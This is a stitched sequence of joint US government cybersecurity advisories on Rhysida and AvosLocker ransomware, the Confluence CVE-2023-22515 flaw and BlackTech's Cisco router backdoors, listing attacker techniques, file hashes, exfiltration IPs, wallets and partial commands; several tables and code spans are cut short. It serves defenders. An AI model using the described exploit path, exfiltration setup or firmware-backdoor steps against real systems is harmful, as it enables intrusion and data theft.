4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329 |
pskill64.exe |
7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d |
pskill.exe |
5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42 |
pslist64.exe |
d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60 |
pslist.exe |
ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a |
psloglist64.exe |
5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636 |
psloglist.exe |
dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f |
pspasswd64.exe |
8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f |
pspasswd.exe |
6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801 |
psping64.exe |
d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285 |
psping.exe |
355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140 |
psshutdown64.exe |
4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400 |
psshutdown.exe |
13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123 |
pssuspend64.exe |
4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee |
pssuspend.exe |
95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd |
PSTools.zip |
a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61 |
Pstools.chm |
2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc |
psversion.txt |
8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4 |
psexesvc.exe |
This artifact is created when a user establishes a connection using |
See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Additional notable TTPs have been published by the Check Point Incident Response Team.[11]
Technique Title |
ID |
Use |
---|---|---|
Develop Capabilities |
Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems. |
Technique Title |
ID |
Use |
---|---|---|
Valid Accounts |
Rhysida actors are known to use valid credentials to access internal VPN access points of victims. |
|
Exploit Public-Facing Application |
Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol. |
|
Phishing |
Rhysida actors are known to conduct successful phishing attacks. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter: PowerShell |
Rhysida actors used PowerShell commands ( |
|
Command and Scripting Interpreter: Windows Command Shell |
Rhysida actors used batch scripting to place |
Technique Title |
ID |
Use |
---|---|---|
Process Injection: Portable Executable Injection |
Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems. |
Technique Title |
ID |
Use |
---|---|---|
Indicator Removal: Clear Windows Event Logs |
Rhysida actors used |
|
Indicator Removal: File Deletion |
Rhysida actors used PowerShell commands to delete binary strings. |
|
Hide Artifacts: Hidden Window |
Rhysida actors have executed hidden PowerShell windows. |
Technique Title |
ID |
Use |
---|---|---|
OS Credential Dumping: NTDS |
Rhysida actors have been observed using |
|
Modify Registry |
Rhysida actors were observed running registry modification commands via |
Technique Title |
ID |
Use |
System Network Configuration Discovery |
Rhysida actors used the |
|
Remote System Discovery |
Rhysida actors used the command |
|
System Owner/User Discovery |
Rhysida actors leveraged |
|
Permission Groups Discovery: Local Groups |
Rhysida actors used the command |
|
Permission Groups Discovery: Domain Groups |
Rhysida actors used the command |
|
Account Discovery: Domain Account |
Rhysida actors used the command |
|
Domain Trust Discovery |
Rhysida actors used the Windows utility |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
Rhysida actors are known to use RDP for lateral movement. |
|
Remote Services: SSH |
Rhysida actors used compromised user credentials to leverage PuTTy and remotely connect to victim systems via SSH. |
Technique Title |
ID |
Use |
---|---|---|
Remote Access Software |
Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence. |
Technique Title |
ID |
Use |
---|---|---|
Data Encrypted for Impact |
Rhysida actors encrypted victim data using a 4096-bit RSA encryption key that implements a ChaCha20 algorithm. |
|
Financial Theft |
Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid. |
FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
Sophos contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.
November 15, 2023: Initial version.
]]>The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.
CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.
For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting the following versions of Atlassian Confluence Data Center and Server. Note: Atlassian Cloud sites (sites accessed by an atlassian.net domain), including Confluence Data Center and Server versions before 8.0.0, are not affected by this vulnerability.
|
|
|
Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. More specifically, threat actors can change the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a request on the unauthenticated /server-info.action endpoint.
Considering the root cause of the vulnerability allows threat actors to modify critical configuration settings, CISA, FBI, and MS-ISAC assess that the threat actors may not be limited to creating new administrator accounts. Open source further indicates an Open Web Application Security Project (OWASP) classification of injection (i.e., CWE-20: Improper Input Validation) is an appropriate description.[2] Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day—a previously unidentified vulnerability.[1]
On October 5, 2023, CISA added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. Due to the ease of exploitation, CISA, FBI, and MS-ISAC expect to see widespread exploitation of unpatched Confluence instances in government and private networks.
Post-exploitation exfiltration of data can be executed through of a variety of techniques. A predominant method observed involves the use of cURL—a command line tool used to transfer data to or from a server. An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. Note: This does not preclude the effectiveness of alternate methods, but highlights methods observed to date. Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point:
[s3] |
[minio] |
The following User-Agent strings were observed in request headers. Note: As additional threat actors begin to use this CVE due to the availability of publicly posted proof-of-concept code, an increasing variation in User-Agent strings is expected:
Python-requests/2.27.1
curl/7.88.1
Disclaimer: Organizations are recommended to investigate or vet these IP addresses prior to taking action, such as blocking.
The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration:
170.106.106[.]16
43.130.1[.]222
152.32.207[.]23
199.19.110[.]14
95.217.6[.]16
(Note: This is the official rclone.org website)Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3]
Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. See Ruleset Update Summary - 2023/10/12 - v10438.[4]
Network defenders are also encouraged to aggregate application and server-level logging from Confluence servers to a logically separated log search and alerting system, as well as configure alerts for signs of exploitation (as detailed in Atlassian’s security advisory).
Organizations are encouraged to review all affected Confluence instances for evidence of compromise, as outlined by Atlassian.[1] If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform any number of unfettered actions—these include but are not limited to exfiltration of content and system credentials, as well as installation of malicious plugins.
If a potential compromise is detected, organizations should:
These mitigations apply to all organizations using non-cloud Atlassian Confluence Data Center and Server software. CISA, FBI, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to reduce the prevalence of Broken Access Control vulnerabilities, thus strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
As of October 10, 2023, proof-of-concept exploits for CVE-2023-22515 have been observed in open source publications.[5] While there are immediate concerns such as increased risk of exploitation and the potential integration into malware toolkits, the availability of a proof-of-concept presents an array of security and operational challenges that extend beyond these immediate issues. Immediate action is strongly advised to address the potential risks associated with this development.
CISA, FBI, and MS-ISAC recommend taking immediate action to address the potential associated risks and encourage organizations to:
[1] Atlassian: CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server
[2] Rapid7: CVE-2023-22515 Analysis
[3] Microsoft: CVE-2023-22515 Exploit IP Addresses
[4] Proofpoint: Emerging Threats Rulesets
[5] Confluence CVE-2023-22515 Proof of Concept - vulhub
[6] Atlassian Support: Upgrading Confluence
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC.
October 16, 2023: Initial version.
]]>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.
This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.
FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of AvosLocker ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
AvosLocker affiliates use legitimate software and open-source tools during ransomware operations, which include exfiltration-based data extortion. Specifically, affiliates use:
FBI has also observed AvosLocker affiliates:
.bat
) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software.For additional TTPs, see joint CSA Indicators of Compromise Associated with AvosLocker Ransomware.
See Tables 1 and 2 below for IOCs obtained from January 2023–May 2023.
Files and Tools |
MD5 |
psscriptpolicytest_im2hdxqi.g0k.ps1 |
829f2233a1cd77e9ec7de98596cd8165 |
psscriptpolicytest_lysyd03n.o10.ps1 |
6ebd7d7473f0ace3f52c483389cab93f |
psscriptpolicytest_1bokrh3l.2nw.ps1 |
10ef090d2f4c8001faadb0a833d60089 |
psscriptpolicytest_nvuxllhd.fs4.ps1 |
8227af68552198a2d42de51cded2ce60 |
psscriptpolicytest_2by2p21u.4ej.ps1 |
9d0b3796d1d174080cdfdbd4064bea3a |
psscriptpolicytest_te5sbsfv.new.ps1 |
af31b5a572b3208f81dbf42f6c143f99 |
psscriptpolicytest_v3etgbxw.bmm.ps1 |
1892bd45671f17e9f7f63d3ed15e348e |
psscriptpolicytest_fqa24ixq.dtc.ps1 |
cc68eaf36cb90c08308ad0ca3abc17c1 |
psscriptpolicytest_jzjombgn.sol.ps1 |
646dc0b7335cffb671ae3dfd1ebefe47 |
psscriptpolicytest_rdm5qyy1.phg.ps1 |
609a925fd253e82c80262bad31637f19 |
psscriptpolicytest_endvm2zz.qlp.ps1 |
c6a667619fff6cf44f447868d8edd681 |
psscriptpolicytest_s1mgcgdk.25n.ps1 |
3222c60b10e5a7c3158fd1cb3f513640 |
psscriptpolicytest_xnjvzu5o.fta.ps1 |
90ce10d9aca909a8d2524bc265ef2fa4 |
psscriptpolicytest_satzbifj.oli.ps1 |
44a3561fb9e877a2841de36a3698abc0 |
psscriptpolicytest_grjck50v.nyg.ps1 |
5cb3f10db11e1795c49ec6273c52b5f1 |
psscriptpolicytest_0bybivfe.x1t.ps1 |
122ea6581a36f14ab5ab65475370107e |
psscriptpolicytest_bzoicrns.kat.ps1 |
c82d7be7afdc9f3a0e474f019fb7b0f7 |
Files and Tools |
SHA256 |
BEACON.PS1 |
e68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f |
Encoded PowerShell script |
ad5fd10aa2dc82731f3885553763dfd4548651ef3e28c69f77ad035166d63db7 |
Encoded PowerShell script |
48dd7d519dbb67b7a2bb2747729fc46e5832c30cafe15f76c1dbe3a249e5e731 |
Files and Tools |
SHA1 |
PowerShell backdoor |
2d1ce0231cf8ff967c36bbfc931f3807ddba765c |
Email Address |
---|
keishagrey994@outlook[.]com |
Virtual Currency Wallets |
a6dedd35ad745641c52d6a9f8da1fb09101d152f01b4b0e85a64d21c2a0845ee |
bfacebcafff00b94ad2bff96b718a416c353a4ae223aa47d4202cdbc31e09c92 |
418748c1862627cf91e829c64df9440d19f67f8a7628471d4b3a6cc5696944dd |
bc1qn0u8un00nl6uz6uqrw7p50rg86gjrx492jkwfn |
Based on an investigation by an advanced digital forensics group, FBI created the following YARA rule to detect the signature for a file identified as enabling malware. NetMonitor.exe
is a malware masquerading as a legitimate process and has the appearance of a legitimate network monitoring tool. This persistence tool sends pings from the network every five minutes. The NetMonitor executable is configured to use an IP address as its command server, and the program communicates with the server over port 443. During the attack, traffic between NetMonitor and the command server is encrypted, where NetMonitor functions like a reverse proxy and allows actors to connect to the tool from outside the victim’s network.
rule NetMonitor |
See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory.
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
External Remote Services |
AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors. |
Execution | ||
---|---|---|
Technique Title |
ID |
Use |
Command and Scripting Interpreter: PowerShell |
AvosLocker affiliates use custom PowerShell scripts to enable privilege escalation, lateral movement, and to disable antivirus. |
|
Command and Scripting Interpreter: Windows Command Shell |
AvosLocker affiliates use custom |
|
Windows Management Instrumentation |
AvosLocker affiliates use legitimate Windows tools, such as PsExec and Nltest in their execution. |
Persistence |
||
---|---|---|
Technique Title |
ID |
Use |
Server Software Component |
AvosLocker affiliates have uploaded and used custom webshells to enable network access. |
Credential Access |
||
---|---|---|
Technique Title |
ID |
Use |
Credentials from Password Stores |
AvosLocker affiliates use open-source applications Lazagne and Mimikatz to steal credentials from system stores. |
Command and Control |
||
---|---|---|
Technique Title |
ID |
Use |
Protocol Tunneling |
AvosLocker affiliates use open source networking tunneling tools like Ligolo and Chisel. |
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
FBI and CISA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise by AvosLocker ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
In addition, FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
[1] GitHub sysdream | ligolo repository
[2] GitHub jpillora | chisel repository
[3] GitHub BishopFox | sliver repository
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind.
BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise.
For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1]
Download the PDF version of this report: PDF, 808 KB
This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs.
Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks.
BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include:
BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which make them appear legitimate and therefore more difficult for security software to detect [T1553.002].
BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2]
The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks.
Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002].
BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment.
In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router's built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006], however, it is not always necessary.
BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001].
BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH.
File Type |
Description |
---|---|
Old Legitimate Firmware |
The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader. |
Modified Firmware |
The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router. |
Modified Bootloader |
The bootloader allows Modified Firmware to continue evading the router's security features for persistence across reboots. In some cases, only modified firmware is used. |
BlackTech actors use the Cisco router's CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows:
|
conf t |
upgrade rom file bootloader |
To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test.
BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image.
BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging.
To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication.
In order to detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH.
The following are the best mitigation practices to defend against this type of malicious activity:
[1] Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF
[2] Joint CSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF
[3] NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[4] NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[5] Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes.
Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc.
FreeBSD is a registered trademark of The FreeBSD Foundation.
Linux is a registered trademark of Linus Torvalds.
MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.
Windows is a registered trademark of Microsoft Corporation.
